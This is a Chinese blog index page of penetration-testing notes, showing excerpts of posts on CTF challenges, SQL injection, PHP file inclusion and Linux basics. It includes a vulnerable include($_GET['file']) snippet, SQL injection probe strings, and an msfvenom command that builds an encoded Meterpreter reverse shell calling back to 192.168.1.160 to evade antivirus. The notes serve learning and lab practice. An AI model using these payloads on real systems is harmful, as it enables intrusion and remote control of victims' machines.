自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

渗透笔记

记录渗透学习的点点滴滴

  • 博客(18)
  • 收藏
  • 关注

原创 Linux目录及文件总结

1.文件类型d 文件夹- 普通文件l 链接b 块设备文件p 管道文件c 字符设备文件s 套接口文件2.权限1.权限分配r 4 可读权限w 2 可写权限x 1 可执行权限2.文件权限解释drwxr-xr-x 10 root root 4906 jan 14 00:57 usr/文件类型 d所属

2018-02-07 18:19:52 316

原创 ubuntu-desktop-14.04.5(32.bit)搭建KVM

KVM(Kernel-based Virtual Machine)支持虚拟机嵌套,基于硬件的虚拟化环境情况物理机安装vmware 在vmware中安装ubuntu-desktop-14.04.5(32.bit)用以搭建KVMubuntu-desktop-14.04.5(32.bit)搭建KVM步骤1.在vmware中的cpu高级选项中勾选提供intel VT-x/EPT支持,勾选

2018-02-07 01:10:52 355

原创 php文件包含漏洞

1.文件包含的原理1.1为什么要使用文件包含将一些自定义函数或功能写在一个a文件内,当b文件中要使用到a文件内的一些函数或功能时,b文件只需要包含a文件,这样b文件就可以直接调用a文件内定义好的函数或一些功能,这样方便省事。1.2相关测试代码php文件包含代码 if ($_GET['file']) { include $_GET['file'];}els

2018-02-07 00:55:03 1146

原创 MSF生成meterpreter及静态免杀

1.静态免杀1.1编译c文件,静态免杀1.1.1 生成shellcode在kali命令行输入msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '/x00' lhost=192.168.1.160 lport=7777 -f c -o /home/shell/test01.c-

2018-01-26 17:23:27 5602 1

原创 CTF-06

题目说明:VLD1.打开链接,页面如图所示,问我懂不懂VLD 2.查看页面源码,提示index.php.txt文件 3.访问index.php.txt文件,返回的是index.php的操作码 Finding entry pointsBranch analysis from position: 0Jump found. Position 1 = 23, Position

2018-01-24 19:41:43 531

原创 CTF-08

题目说明:pyscript1.打开链接后,界面如图所示,提示要输入密码并提交 2.重新访问首页,并对其抓包–>send to repeater–>go 在响应头中得到Ciphertext 在响应内容中得到一些题目提示 3.根据题目说明,这道题就是写python脚本import hashlibimport requestsimport redef sha1(d

2018-01-19 22:50:04 462

原创 CTF-07

题目说明:天下武功,唯快不破1.打开链接后,页面如图所示 2.这应该是网站根目录下的index.php的源码,分析源码得知: 当访问index.php文件时,会将flag.php的内容写到一个txt文件里, 这个txt文件名为1到1000的一个随机数的md5加密结果, 其路径为根目录下的u目录下 3.编写python脚本爆破文件名,访问这个txt文件,不断刷新主页,增加成功概

2018-01-19 17:41:56 473

原创 CTF-06

题目说明:get flag1.打开链接,页面如下 2.点击Login,页面如下,是个登陆页面,有一个加密的验证码,验证码为对其进行md5加密后取前六位等于页面给定的这个字符串 3.编写python脚本,跑验证码import hashlibdef md5(str): m = hashlib.md5() m.update(str) q = m.hexdigest()

2018-01-19 15:44:45 674

原创 CTF-04

题目说明:phpinfo1.打开链接后,页面为一个phpinfo的页面,查看URL栏发现这是一个文件包含 2.查看了下phpinfo的信息,没有什么可用的信息,页面源码,响应头都没有可用信息,对网站进行扫描,发现了flag.php文件,包含之 3.直接本地包含,发现页面空空如也,说明内容被解析了 4.用php伪协议对其包含php://filter/read=convert

2018-01-19 11:33:41 383

原创 CTF-03

题目说明:ipspoofing1.打开链接后,来到一个页面,浏览一番,在页脚发现一个后台入口administrator,点击进去 2.在后台页面随意输入账号密码点击提交,登陆失败,提示我的ip不在许可范围内 3.查看页面源码,在源码中发现后台默认登陆的账号和密码administrator,administrator 4.再次提交,用burp抓包–>send to repeater–

2018-01-19 10:48:03 511

原创 CTF-02

题目说明:seelog1.打开链接后,就几个黑字:本站是内部网站,非请勿入 2.纯静态页面,源码也无注释提示,对其进行目录扫描,发现存在一个log目录,访问之 3.访问后发现该目录下有两个日志文件,根据题目说明,开始审查日志文件 4.错误日志文件没有有用信息,在访问日志中寻找线索 访问日志中有请求链接,服务器返回状态等有用信息,通过搜索200状态码来查看哪些链接访问成功

2018-01-18 20:23:56 572

原创 CTF-01

题目说明:robot1.打开链接后,界面就一个机器人图片,其他啥也没有 2.根据题目说明,联想到访问robots.txt文件 发现在admin目录下有一个3he11.php文件(此处有一处小坑,文件名中的1很像字母l) 3.访问3he11.php文件,页面返回一片空白,查看页面源码 get flage!

2018-01-17 20:03:08 773

原创 SQL注入-宽字节注入

1. GBK编码gbk为中文编码,是一种双字节编码,将两个字节编译为一个汉字,其中第一个字节称为高位字节,第二个字节称为低位字节。编码范围 高位81-FE 低位40-FE2.宽字节注入原理2.1php测试代码 error_reporting(0);$id = $_GET['id'];$id = addslashes($id);

2018-01-13 13:14:06 760

原创 SQL注入-文件操作

1.通过load_file()函数将文件内容爆出来前提条件 1. 当前权限对该文件可读 2. 文件在该服务器上 3. 路径完整 4. 文件大小小于max_allowed_packet 5. 当前数据库用户有FILE权限 6. secure_file_priv的值为空,如果值为某目录,那么就只能对该目录的文件进行操作 SELEC

2018-01-13 11:59:18 5068

原创 SQL注入-盲注

执行SQL查询,其内容不能直接返回到页面,那么可以尝试盲注查询语句$id=$_GET['id'];SELECT * FROM test WHERE id='$id' LIMIT 0,1;1. 基于布尔的盲注通过页面是否异常来判断1.1 ascii()注入爆MySQL版本 ?id=1' AND left(version(),1)=5--+ //判

2018-01-12 00:42:54 1047

原创 SQL注入-有回显的注入

1.MySQL相关在MySQL 5+版本后,加入了information_schema这个库,该库存放了所有数据库的信息information_schema.columns包含所有表的字段 字段 table_schema 数据库名 table_name 表名 column_name

2018-01-12 00:13:09 6561

原创 SQL注入-注入点判断

1.注入点判断传入SQL语句可控参数分为两类 1. 数字类型,参数不用被引号括起来,如?id=1 2. 其他类型,参数要被引号扩起来,如?name="phone"判断某个链接是否存在SQL注入,可以通过对其传入的可控参数进行简单的构造,通过服务端返回的内容来判断有无注入其他类型构造测试 预期结果

2018-01-11 23:17:17 28445

原创 SQL注入-原理

1.原理由于过滤不严格,传入SQL语句中的可控参数经过构造,修改了SQL语句本身的结构,最后该语句被解析执行,造成信息泄露,被修改,被删除等后果,更甚造成服务器被掌控。php测试代码 error_reporting(0);$id = $_GET['id'];$con = mysql_connect('localhost','root','root');if(!$con){

2018-01-11 22:33:46 258

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除